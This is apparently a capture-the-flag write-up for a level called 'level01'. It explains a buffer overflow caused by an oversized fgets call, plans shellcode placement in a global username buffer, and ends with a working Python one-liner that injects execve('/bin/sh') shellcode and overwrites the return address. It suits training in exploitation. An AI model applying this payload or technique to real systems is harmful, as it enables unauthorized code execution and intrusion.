# Level 01

## Observations

1. The correct username is `dat_wil` and the correct password is `admin` but this brings us nowhere.
2. The username is stored in a global buffer of great size whose address can be found.
3. Only the 7 firsts characters of the username are checked.
4. The password is stored in a 80 bytes buffer but up to 256 bytes can be written because `fgets` *size* parameter is too big.

## Plan

We'll use the plenty of space we have in the username buffer to write a shellcode after the username (*alternatively we can write the shellcode in an environment variable or in the program's arguments*).  
Then we will trigger a buffer overflow to overwrite EIP on the stack and force the program to return to the address where our shellcode is located.

To pass the username and password checked while performing a buffer overflow, we need to give the program the following items :

1. **Username** : The correct username followed by a shellcode (*only the 7 first characters are checked*)
2. **Password** : 80 bytes of junk data followed by the address of our shellcode

The address of our shellcode is simply the address of the global username buffer which can be found using `nm` or `gdb` but we must not forget to add 7 bytes to skip the actual username.  
On my VM the address is `0x0804a040` but because the VM uses little endian, we need to invert to order of the bytes when we write our payload.  
Thanksfully, Python has an easy way of doing that with `[::-1]`. 

## Payload

```bash
(python -c 'print "dat_wil" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\n" + "A" * 80 + "\x08\x04\xa0\x47"[::-1]'; cat -) | ./level01
```

Payload was found [here](https://shell-storm.org/shellcode/files/shellcode-827.php).